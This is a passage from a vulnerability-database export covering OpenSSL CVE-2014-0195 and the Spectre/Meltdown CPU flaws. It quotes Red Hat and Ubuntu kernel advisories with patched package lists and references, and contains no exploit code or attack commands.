"https://github.com/ricedu/cve-2014-0195" }, { "trust": 0.1, "url": "https://nvd.nist.gov" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2014-0195" }, { "trust": 0.1, "url": "http://tools.cisco.com/security/center/viewalert.x?alertid=34546" }, { "trust": 0.1, "url": "https://usn.ubuntu.com/2232-3/" }, { "trust": 0.1, "url": "https://launchpad.net/bugs/1356843" }, { "trust": 0.1, "url": "http://www.ubuntu.com/usn/usn-2232-1" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssl/0.9.8k-7ubuntu8.21" }, { "trust": 0.1, "url": "http://www.ubuntu.com/usn/usn-2232-4" }, { "trust": 0.1, "url": "http://www.mandriva.com/en/support/security/" }, { "trust": 0.1, "url": "http://www.mandriva.com/en/support/security/advisories/" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0221" }, { "trust": 0.1, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay/?docid=emr_n" }, { "trust": 0.1, "url": "http://www.hp.com/swpublishing/mtx-f6c141a7feeb4a358bbb28300f" }, { "trust": 0.1, "url": "http://www.hp.com/swpublishing/mtx-bd9a1cf60e344c549c4888db93" }, { "trust": 0.1, "url": "http://www.hp.com/swpublishing/mtx-3395d737d98f42149125b9bb05" }, { "trust": 0.1, "url": "http://www.hp.com/swpublishing/mtx-c0d32bac154a4d93839d8cd1f2" }, { "trust": 0.1, "url": "http://www.hp.com/swpublishing/mtx-8aefeaf490284a7691eca97d13" }, { "trust": 0.1, "url": "http://www.hp.com/swpublishing/mtx-e8076c2a35804685ad65b2b1ba" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-3470" }, { "trust": 0.1, "url": "http://creativecommons.org/licenses/by-sa/2.5" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-5298" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0221" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0198" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0224" }, { "trust": 0.1, "url": "http://security.gentoo.org/" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0195" }, { "trust": 0.1, "url": "https://bugs.gentoo.org." }, { "trust": 0.1, "url": "https://twitter.com/vmwaresrc" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-5298" }, { "trust": 0.1, "url": "http://www.vmware.com/security/advisories" }, { "trust": 0.1, "url": "http://kb.vmware.com/kb/1055" }, { "trust": 0.1, "url": "http://kb.vmware.com/kb/2077359" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0198" }, { "trust": 0.1, "url": "https://www.vmware.com/support/policies/lifecycle.html" }, { "trust": 0.1, "url": "http://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce" }, { "trust": 0.1, "url": "https://www.vmware.com/support/policies/security_response.html" }, { "trust": 0.1, "url": "https://www.vmware.com/patchmgr/download.portal" }, { "trust": 0.1, "url": "https://www.hp.com/go/swa" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0224.html" }, { "trust": 0.1, "url": "https://access.redhat.com/site/articles/11258" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0198.html" }, { "trust": 0.1, "url": "https://access.redhat.com/security/updates/classification/#important" }, { "trust": 0.1, "url": "https://access.redhat.com/site/solutions/906703" }, { "trust": 0.1, "url": "https://access.redhat.com/site/articles/904433" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2010-5298.html" }, { "trust": 0.1, "url": "https://rhn.redhat.com/errata/rhsa-2014-0628.html" }, { "trust": 0.1, "url": "https://access.redhat.com/security/team/contact/" }, { "trust": 0.1, "url": "https://www.redhat.com/mailman/listinfo/rhsa-announce" }, { "trust": 0.1, "url": "https://bugzilla.redhat.com/):" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-3470.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0221.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0195.html" }, { "trust": 0.1, "url": "https://access.redhat.com/security/team/key/#package" } ], "sources": [ { "db": "ZDI", "id": "ZDI-14-173" }, { "db": "VULMON", "id": "CVE-2014-0195" }, { "db": "BID", "id": "67900" }, { "db": "JVNDB", "id": "JVNDB-2014-002765" }, { "db": "PACKETSTORM", "id": "127917" }, { "db": "PACKETSTORM", "id": "127018" }, { "db": "PACKETSTORM", "id": "127807" }, { "db": "PACKETSTORM", "id": "127630" }, { "db": "PACKETSTORM", "id": "127045" }, { "db": "PACKETSTORM", "id": "127086" }, { "db": "PACKETSTORM", "id": "126961" }, { "db": "PACKETSTORM", "id": "126930" }, { "db": "NVD", "id": "CVE-2014-0195" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "ZDI", "id": "ZDI-14-173" }, { "db": "VULMON", "id": "CVE-2014-0195" }, { "db": "BID", "id": "67900" }, { "db": "JVNDB", "id": "JVNDB-2014-002765" }, { "db": "PACKETSTORM", "id": "127917" }, { "db": "PACKETSTORM", "id": "127018" }, { "db": "PACKETSTORM", "id": "127807" }, { "db": "PACKETSTORM", "id": "127630" }, { "db": "PACKETSTORM", "id": "127045" }, { "db": "PACKETSTORM", "id": "127086" }, { "db": "PACKETSTORM", "id": "126961" }, { "db": "PACKETSTORM", "id": "126930" }, { "db": "NVD", "id": "CVE-2014-0195" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2014-06-05T00:00:00", "db": "ZDI", "id": "ZDI-14-173" }, { "date": "2014-06-05T00:00:00", "db": "VULMON", "id": "CVE-2014-0195" }, { "date": "2014-06-05T00:00:00", "db": "BID", "id": "67900" }, { "date": "2014-06-09T00:00:00", "db": "JVNDB", "id": "JVNDB-2014-002765" }, { "date": "2014-08-18T23:09:13", "db": "PACKETSTORM", "id": "127917" }, { "date": "2014-06-10T17:34:04", "db": "PACKETSTORM", "id": "127018" }, { "date": "2014-08-08T21:53:16", "db": "PACKETSTORM", "id": "127807" }, { "date": "2014-07-28T20:36:25", "db": "PACKETSTORM", "id": "127630" }, { "date": "2014-06-11T23:18:46", "db": "PACKETSTORM", "id": "127045" }, { "date": "2014-06-13T13:31:32", "db": "PACKETSTORM", "id": "127086" }, { "date": "2014-06-05T21:13:52", "db": "PACKETSTORM", "id": "126961" }, { "date": "2014-06-05T15:19:35", "db": "PACKETSTORM", "id": "126930" }, { "date": "2014-06-05T21:55:06.147000", "db": "NVD", "id": "CVE-2014-0195" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2014-06-05T00:00:00", "db": "ZDI", "id": "ZDI-14-173" }, { "date": "2023-11-07T00:00:00", "db": "VULMON", "id": "CVE-2014-0195" }, { "date": "2017-05-23T16:25:00", "db": "BID", "id": "67900" }, { "date": "2015-12-17T00:00:00", "db": "JVNDB", "id": "JVNDB-2014-002765" }, { "date": "2023-11-07T02:18:11.613000", "db": "NVD", "id": "CVE-2014-0195" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "network", "sources": [ { "db": "BID", "id": "67900" } ], "trust": 0.3 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "OpenSSL of d1_both.c of dtls1_reassemble_fragment Vulnerability in arbitrary code execution in function", "sources": [ { "db": "JVNDB", "id": "JVNDB-2014-002765" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Design Error", "sources": [ { "db": "BID", "id": "67900" } ], "trust": 0.3 } }
var-201801-1711
Vulnerability from variot
Systems with microprocessors utilizing speculative execution and indirect branch prediction may allow unauthorized disclosure of information to an attacker with local user access via a side-channel analysis of the data cache. Has speculative execution function and out-of-order execution function CPU Several researchers have reported methods of performing side-channel attacks against Has speculative execution function and out-of-order execution function CPU side-channel attack method against (Spectre and Meltdown) has been reported. For more information, Google Project Zero blog post in ("Reading privileged memory with a side-channel") or Graz University of Technology (TU Graz) information from researchers in ("Meltdown and Spectre") Please refer to. "Reading privileged memory with a side-channel"https://googleprojectzero.blogspot.jp/2018/01/reading-privileged-memory-with-side.html"Meltdown and Spectre"https://meltdownattack.com/Sensitive information can be obtained from processes running with user privileges. Spectre As for the attack, crafted Javascript by the code Javascript cannot be obtained from web It has been reported that data can be obtained during the browser process. SpectreMeltdownCPU mechanism for triggeringSpeculative execution from branch predictionOut-of-order executionAffected platformsCPUs that perform speculative execution from branch predictionCPUs that allow memory reads in out-of-order instructionsDifficulty of successful attackHigh - Requires tailoring to the software environment of the victim processLow - Kernel memory access exploit code is mostly universalImpactCross- and intra-process (including kernel) memory disclosureKernel memory disclosure to userspaceSoftware mitigationsVariant 1: Compiler changes. Web browser updates to help prevent exploitation from JavaScriptVariant 2: Indirect Branch Restricted Speculation (IBRS). Note: The software mitigation for Spectre variant 2 requires CPU microcode updatesKernel page-table isolation (KPTI)CVE-2017-5715 Affected CVE-2017-5753 Affected CVE-2017-5754 Affected. Two vulnerabilities are identified, known as "Variant 3a" and "Variant 4". CPUhardware is a set of firmware that runs in the CPU (Central Processing Unit) for managing and controlling the CPU. The Spectre vulnerability exists in the CPU processor core. Because Intel does not separate low-privileged applications from accessing kernel memory, an attacker can use a malicious application to obtain private data that should be quarantined. Attackers can exploit this issue to obtain sensitive information that may aid in further attacks. Qualcomm Closed-Source Components are prone to multiple unspecified vulnerabilities. An attacker can exploit these issues to perform unauthorized actions. This may aid in further attacks. These issues are being tracked by Android Bug IDs A-78135902, A-66913713, A-67712316, A-79419833, A-109678200, A-78283451, A-78285196, A-78284194, A-78284753, A-78284517, A-78240177, A-78239686, A-78284545, A-109660689, A-78240324, A-68141338, A-78286046, A-73539037, A-73539235, A-71501115, A-33757308, A-74236942, A-77485184, A-77484529, A-33385206, A-79419639, A-79420511, A-109678338, and A-112279564. Intel and ARM CPU chips have an information disclosure vulnerability, which originates from a flaw in the processor data boundary mechanism. The following products and versions are affected: ARM Cortex-A75; Intel Xeon E5-1650 v3, v2, v4; Xeon E3-1265l v2, v3, v4; Xeon E3-1245 v2, v3, v5, v6; Xeon X7542 wait.
Security Fix(es):
-
hw: cpu: speculative execution permission faults handling (CVE-2017-5754)
-
Kernel: error in exception handling leads to DoS (CVE-2018-8897)
For more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.
Bug Fix(es):
-
If an NFSv3 client mounted a subdirectory of an exported file system, a directory entry to the mount hosting the export was incorrectly held even after clearing the cache. Consequently, attempts to unmount the subdirectory with the umount command failed with the EBUSY error. With this update, the underlying source code has been fixed, and the unmount operation now succeeds as expected in the described situation. (BZ#1538588)
-
The kernel build requirements have been updated to the GNU Compiler Collection (GCC) compiler version that has the support for Retpolines. The Retpolines mechanism is a software construct that leverages specific knowledge of the underlying hardware to mitigate the branch target injection, also known as Spectre variant 2 vulnerability described in CVE-2017-5715. (BZ#1554254)
-
X-Scanned-By: MIMEDefang 2.79 on 10.5.11.16 X-Greylist: Sender IP whitelisted, not delayed by milter-greylist-4.5.16 (mx1.redhat.com [10.5.110.25]); Thu, 04 Jan 2018 01:01:01 +0000 (UTC)
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
===================================================================== Red Hat Security Advisory
Synopsis: Important: kernel security update Advisory ID: RHSA-2018:0008-01 Product: Red Hat Enterprise Linux Advisory URL: https://access.redhat.com/errata/RHSA-2018:0008 Issue date: 2018-01-03 =====================================================================
- Summary:
An update for kernel is now available for Red Hat Enterprise Linux 6.
Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
- Relevant releases/architectures:
Red Hat Enterprise Linux Desktop (v. 6) - i386, noarch, x86_64 Red Hat Enterprise Linux Desktop Optional (v. 6) - i386, x86_64 Red Hat Enterprise Linux HPC Node (v. 6) - noarch, x86_64 Red Hat Enterprise Linux HPC Node Optional (v. 6) - x86_64 Red Hat Enterprise Linux Server (v. 6) - i386, noarch, ppc64, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 6) - i386, ppc64, s390x, x86_64 Red Hat Enterprise Linux Workstation (v. 6) - i386, noarch, x86_64 Red Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64
- Description:
The kernel packages contain the Linux kernel, the core of any Linux operating system.
Security Fix(es):
An industry-wide issue was found in the way many modern microprocessor designs have implemented speculative execution of instructions (a commonly used performance optimization). There are three primary variants of the issue which differ in the way the speculative execution can be exploited.
Note: This issue is present in hardware and cannot be fully fixed via software update. The updated kernel packages provide software mitigation for this hardware issue at a cost of potential performance penalty. Please refer to References section for further information about this issue and the performance impact.
In this update mitigations for x86-64 architecture are provided.
Variant CVE-2017-5753 triggers the speculative execution by performing a bounds-check bypass. It relies on the presence of a precisely-defined instruction sequence in the privileged code as well as the fact that memory accesses may cause allocation into the microprocessor's data cache even for speculatively executed instructions that never actually commit (retire). As a result, an unprivileged attacker could use this flaw to cross the syscall boundary and read privileged memory by conducting targeted cache side-channel attacks. (CVE-2017-5753, Important)
Variant CVE-2017-5715 triggers the speculative execution by utilizing branch target injection. It relies on the presence of a precisely-defined instruction sequence in the privileged code as well as the fact that memory accesses may cause allocation into the microprocessor's data cache even for speculatively executed instructions that never actually commit (retire). As a result, an unprivileged attacker could use this flaw to cross the syscall and guest/host boundaries and read privileged memory by conducting targeted cache side-channel attacks. (CVE-2017-5715, Important)
Variant CVE-2017-5754 relies on the fact that, on impacted microprocessors, during speculative execution of instruction permission faults, exception generation triggered by a faulting access is suppressed until the retirement of the whole instruction block. In a combination with the fact that memory accesses may populate the cache even when the block is being dropped and never committed (executed), an unprivileged local attacker could use this flaw to read privileged (kernel space) memory by conducting targeted cache side-channel attacks. (CVE-2017-5754, Important)
Note: CVE-2017-5754 affects Intel x86-64 microprocessors. AMD x86-64 microprocessors are not affected by this issue.
Red Hat would like to thank Google Project Zero for reporting these issues.
- Solution:
For details on how to apply this update, which includes the changes described in this advisory, refer to:
https://access.redhat.com/articles/11258
The system must be rebooted for this update to take effect.
- Bugs fixed (https://bugzilla.redhat.com/):
1519778 - CVE-2017-5753 hw: cpu: speculative execution bounds-check bypass 1519780 - CVE-2017-5715 hw: cpu: speculative execution branch target injection 1519781 - CVE-2017-5754 hw: cpu: speculative execution permission faults handling
- Package List:
Red Hat Enterprise Linux Desktop (v. 6):
Source: kernel-2.6.32-696.18.7.el6.src.rpm
i386: kernel-2.6.32-696.18.7.el6.i686.rpm kernel-debug-2.6.32-696.18.7.el6.i686.rpm kernel-debug-debuginfo-2.6.32-696.18.7.el6.i686.rpm kernel-debug-devel-2.6.32-696.18.7.el6.i686.rpm kernel-debuginfo-2.6.32-696.18.7.el6.i686.rpm kernel-debuginfo-common-i686-2.6.32-696.18.7.el6.i686.rpm kernel-devel-2.6.32-696.18.7.el6.i686.rpm kernel-headers-2.6.32-696.18.7.el6.i686.rpm perf-2.6.32-696.18.7.el6.i686.rpm perf-debuginfo-2.6.32-696.18.7.el6.i686.rpm python-perf-debuginfo-2.6.32-696.18.7.el6.i686.rpm
noarch: kernel-abi-whitelists-2.6.32-696.18.7.el6.noarch.rpm kernel-doc-2.6.32-696.18.7.el6.noarch.rpm kernel-firmware-2.6.32-696.18.7.el6.noarch.rpm
x86_64: kernel-2.6.32-696.18.7.el6.x86_64.rpm kernel-debug-2.6.32-696.18.7.el6.x86_64.rpm kernel-debug-debuginfo-2.6.32-696.18.7.el6.i686.rpm kernel-debug-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm kernel-debug-devel-2.6.32-696.18.7.el6.i686.rpm kernel-debug-devel-2.6.32-696.18.7.el6.x86_64.rpm kernel-debuginfo-2.6.32-696.18.7.el6.i686.rpm kernel-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm kernel-debuginfo-common-i686-2.6.32-696.18.7.el6.i686.rpm kernel-debuginfo-common-x86_64-2.6.32-696.18.7.el6.x86_64.rpm kernel-devel-2.6.32-696.18.7.el6.x86_64.rpm kernel-headers-2.6.32-696.18.7.el6.x86_64.rpm perf-2.6.32-696.18.7.el6.x86_64.rpm perf-debuginfo-2.6.32-696.18.7.el6.i686.rpm perf-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm python-perf-debuginfo-2.6.32-696.18.7.el6.i686.rpm python-perf-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm
Red Hat Enterprise Linux Desktop Optional (v. 6):
i386: kernel-debug-debuginfo-2.6.32-696.18.7.el6.i686.rpm kernel-debuginfo-2.6.32-696.18.7.el6.i686.rpm kernel-debuginfo-common-i686-2.6.32-696.18.7.el6.i686.rpm perf-debuginfo-2.6.32-696.18.7.el6.i686.rpm python-perf-2.6.32-696.18.7.el6.i686.rpm python-perf-debuginfo-2.6.32-696.18.7.el6.i686.rpm
x86_64: kernel-debug-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm kernel-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm kernel-debuginfo-common-x86_64-2.6.32-696.18.7.el6.x86_64.rpm perf-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm python-perf-2.6.32-696.18.7.el6.x86_64.rpm python-perf-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm
Red Hat Enterprise Linux HPC Node (v. 6):
Source: kernel-2.6.32-696.18.7.el6.src.rpm
noarch: kernel-abi-whitelists-2.6.32-696.18.7.el6.noarch.rpm kernel-doc-2.6.32-696.18.7.el6.noarch.rpm kernel-firmware-2.6.32-696.18.7.el6.noarch.rpm
x86_64: kernel-2.6.32-696.18.7.el6.x86_64.rpm kernel-debug-2.6.32-696.18.7.el6.x86_64.rpm kernel-debug-debuginfo-2.6.32-696.18.7.el6.i686.rpm kernel-debug-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm kernel-debug-devel-2.6.32-696.18.7.el6.i686.rpm kernel-debug-devel-2.6.32-696.18.7.el6.x86_64.rpm kernel-debuginfo-2.6.32-696.18.7.el6.i686.rpm kernel-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm kernel-debuginfo-common-i686-2.6.32-696.18.7.el6.i686.rpm kernel-debuginfo-common-x86_64-2.6.32-696.18.7.el6.x86_64.rpm kernel-devel-2.6.32-696.18.7.el6.x86_64.rpm kernel-headers-2.6.32-696.18.7.el6.x86_64.rpm perf-2.6.32-696.18.7.el6.x86_64.rpm perf-debuginfo-2.6.32-696.18.7.el6.i686.rpm perf-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm python-perf-debuginfo-2.6.32-696.18.7.el6.i686.rpm python-perf-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm
Red Hat Enterprise Linux HPC Node Optional (v. 6):
x86_64: kernel-debug-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm kernel-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm kernel-debuginfo-common-x86_64-2.6.32-696.18.7.el6.x86_64.rpm perf-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm python-perf-2.6.32-696.18.7.el6.x86_64.rpm python-perf-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm
Red Hat Enterprise Linux Server (v. 6):
Source: kernel-2.6.32-696.18.7.el6.src.rpm
i386: kernel-2.6.32-696.18.7.el6.i686.rpm kernel-debug-2.6.32-696.18.7.el6.i686.rpm kernel-debug-debuginfo-2.6.32-696.18.7.el6.i686.rpm kernel-debug-devel-2.6.32-696.18.7.el6.i686.rpm kernel-debuginfo-2.6.32-696.18.7.el6.i686.rpm kernel-debuginfo-common-i686-2.6.32-696.18.7.el6.i686.rpm kernel-devel-2.6.32-696.18.7.el6.i686.rpm kernel-headers-2.6.32-696.18.7.el6.i686.rpm perf-2.6.32-696.18.7.el6.i686.rpm perf-debuginfo-2.6.32-696.18.7.el6.i686.rpm python-perf-debuginfo-2.6.32-696.18.7.el6.i686.rpm
noarch: kernel-abi-whitelists-2.6.32-696.18.7.el6.noarch.rpm kernel-doc-2.6.32-696.18.7.el6.noarch.rpm kernel-firmware-2.6.32-696.18.7.el6.noarch.rpm
ppc64: kernel-2.6.32-696.18.7.el6.ppc64.rpm kernel-bootwrapper-2.6.32-696.18.7.el6.ppc64.rpm kernel-debug-2.6.32-696.18.7.el6.ppc64.rpm kernel-debug-debuginfo-2.6.32-696.18.7.el6.ppc64.rpm kernel-debug-devel-2.6.32-696.18.7.el6.ppc64.rpm kernel-debuginfo-2.6.32-696.18.7.el6.ppc64.rpm kernel-debuginfo-common-ppc64-2.6.32-696.18.7.el6.ppc64.rpm kernel-devel-2.6.32-696.18.7.el6.ppc64.rpm kernel-headers-2.6.32-696.18.7.el6.ppc64.rpm perf-2.6.32-696.18.7.el6.ppc64.rpm perf-debuginfo-2.6.32-696.18.7.el6.ppc64.rpm python-perf-debuginfo-2.6.32-696.18.7.el6.ppc64.rpm
s390x: kernel-2.6.32-696.18.7.el6.s390x.rpm kernel-debug-2.6.32-696.18.7.el6.s390x.rpm kernel-debug-debuginfo-2.6.32-696.18.7.el6.s390x.rpm kernel-debug-devel-2.6.32-696.18.7.el6.s390x.rpm kernel-debuginfo-2.6.32-696.18.7.el6.s390x.rpm kernel-debuginfo-common-s390x-2.6.32-696.18.7.el6.s390x.rpm kernel-devel-2.6.32-696.18.7.el6.s390x.rpm kernel-headers-2.6.32-696.18.7.el6.s390x.rpm kernel-kdump-2.6.32-696.18.7.el6.s390x.rpm kernel-kdump-debuginfo-2.6.32-696.18.7.el6.s390x.rpm kernel-kdump-devel-2.6.32-696.18.7.el6.s390x.rpm perf-2.6.32-696.18.7.el6.s390x.rpm perf-debuginfo-2.6.32-696.18.7.el6.s390x.rpm python-perf-debuginfo-2.6.32-696.18.7.el6.s390x.rpm
x86_64: kernel-2.6.32-696.18.7.el6.x86_64.rpm kernel-debug-2.6.32-696.18.7.el6.x86_64.rpm kernel-debug-debuginfo-2.6.32-696.18.7.el6.i686.rpm kernel-debug-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm kernel-debug-devel-2.6.32-696.18.7.el6.i686.rpm kernel-debug-devel-2.6.32-696.18.7.el6.x86_64.rpm kernel-debuginfo-2.6.32-696.18.7.el6.i686.rpm kernel-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm kernel-debuginfo-common-i686-2.6.32-696.18.7.el6.i686.rpm kernel-debuginfo-common-x86_64-2.6.32-696.18.7.el6.x86_64.rpm kernel-devel-2.6.32-696.18.7.el6.x86_64.rpm kernel-headers-2.6.32-696.18.7.el6.x86_64.rpm perf-2.6.32-696.18.7.el6.x86_64.rpm perf-debuginfo-2.6.32-696.18.7.el6.i686.rpm perf-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm python-perf-debuginfo-2.6.32-696.18.7.el6.i686.rpm python-perf-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 6):
i386: kernel-debug-debuginfo-2.6.32-696.18.7.el6.i686.rpm kernel-debuginfo-2.6.32-696.18.7.el6.i686.rpm kernel-debuginfo-common-i686-2.6.32-696.18.7.el6.i686.rpm perf-debuginfo-2.6.32-696.18.7.el6.i686.rpm python-perf-2.6.32-696.18.7.el6.i686.rpm python-perf-debuginfo-2.6.32-696.18.7.el6.i686.rpm
ppc64: kernel-debug-debuginfo-2.6.32-696.18.7.el6.ppc64.rpm kernel-debuginfo-2.6.32-696.18.7.el6.ppc64.rpm kernel-debuginfo-common-ppc64-2.6.32-696.18.7.el6.ppc64.rpm perf-debuginfo-2.6.32-696.18.7.el6.ppc64.rpm python-perf-2.6.32-696.18.7.el6.ppc64.rpm python-perf-debuginfo-2.6.32-696.18.7.el6.ppc64.rpm
s390x: kernel-debug-debuginfo-2.6.32-696.18.7.el6.s390x.rpm kernel-debuginfo-2.6.32-696.18.7.el6.s390x.rpm kernel-debuginfo-common-s390x-2.6.32-696.18.7.el6.s390x.rpm kernel-kdump-debuginfo-2.6.32-696.18.7.el6.s390x.rpm perf-debuginfo-2.6.32-696.18.7.el6.s390x.rpm python-perf-2.6.32-696.18.7.el6.s390x.rpm python-perf-debuginfo-2.6.32-696.18.7.el6.s390x.rpm
x86_64: kernel-debug-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm kernel-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm kernel-debuginfo-common-x86_64-2.6.32-696.18.7.el6.x86_64.rpm perf-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm python-perf-2.6.32-696.18.7.el6.x86_64.rpm python-perf-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 6):
Source: kernel-2.6.32-696.18.7.el6.src.rpm
i386: kernel-2.6.32-696.18.7.el6.i686.rpm kernel-debug-2.6.32-696.18.7.el6.i686.rpm kernel-debug-debuginfo-2.6.32-696.18.7.el6.i686.rpm kernel-debug-devel-2.6.32-696.18.7.el6.i686.rpm kernel-debuginfo-2.6.32-696.18.7.el6.i686.rpm kernel-debuginfo-common-i686-2.6.32-696.18.7.el6.i686.rpm kernel-devel-2.6.32-696.18.7.el6.i686.rpm kernel-headers-2.6.32-696.18.7.el6.i686.rpm perf-2.6.32-696.18.7.el6.i686.rpm perf-debuginfo-2.6.32-696.18.7.el6.i686.rpm python-perf-debuginfo-2.6.32-696.18.7.el6.i686.rpm
noarch: kernel-abi-whitelists-2.6.32-696.18.7.el6.noarch.rpm kernel-doc-2.6.32-696.18.7.el6.noarch.rpm kernel-firmware-2.6.32-696.18.7.el6.noarch.rpm
x86_64: kernel-2.6.32-696.18.7.el6.x86_64.rpm kernel-debug-2.6.32-696.18.7.el6.x86_64.rpm kernel-debug-debuginfo-2.6.32-696.18.7.el6.i686.rpm kernel-debug-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm kernel-debug-devel-2.6.32-696.18.7.el6.i686.rpm kernel-debug-devel-2.6.32-696.18.7.el6.x86_64.rpm kernel-debuginfo-2.6.32-696.18.7.el6.i686.rpm kernel-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm kernel-debuginfo-common-i686-2.6.32-696.18.7.el6.i686.rpm kernel-debuginfo-common-x86_64-2.6.32-696.18.7.el6.x86_64.rpm kernel-devel-2.6.32-696.18.7.el6.x86_64.rpm kernel-headers-2.6.32-696.18.7.el6.x86_64.rpm perf-2.6.32-696.18.7.el6.x86_64.rpm perf-debuginfo-2.6.32-696.18.7.el6.i686.rpm perf-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm python-perf-debuginfo-2.6.32-696.18.7.el6.i686.rpm python-perf-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 6):
i386: kernel-debug-debuginfo-2.6.32-696.18.7.el6.i686.rpm kernel-debuginfo-2.6.32-696.18.7.el6.i686.rpm kernel-debuginfo-common-i686-2.6.32-696.18.7.el6.i686.rpm perf-debuginfo-2.6.32-696.18.7.el6.i686.rpm python-perf-2.6.32-696.18.7.el6.i686.rpm python-perf-debuginfo-2.6.32-696.18.7.el6.i686.rpm
x86_64: kernel-debug-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm kernel-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm kernel-debuginfo-common-x86_64-2.6.32-696.18.7.el6.x86_64.rpm perf-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm python-perf-2.6.32-696.18.7.el6.x86_64.rpm python-perf-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- References:
https://access.redhat.com/security/updates/classification/#important https://access.redhat.com/security/vulnerabilities/speculativeexecution https://access.redhat.com/security/cve/CVE-2017-5753 https://access.redhat.com/security/cve/CVE-2017-5715 https://access.redhat.com/security/cve/CVE-2017-5754
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2018 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
iD8DBQFaTXwuXlSAg2UNWIIRAp3LAKCNdSqjVu7zsXcUTnpGuuQAuUlTpwCfTE/O OR+iGnoY+cALbsBWKwbmzQM= =V4ow -----END PGP SIGNATURE-----
-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . ========================================================================== Ubuntu Security Notice USN-3523-1 January 09, 2018
linux vulnerabilities
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 17.10
Summary:
Several security issues were fixed in the Linux kernel. This flaw is known as Meltdown. (CVE-2017-5754)
Jann Horn discovered that the Berkeley Packet Filter (BPF) implementation in the Linux kernel did not properly check the relationship between pointer values and the BPF stack. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2017-17863)
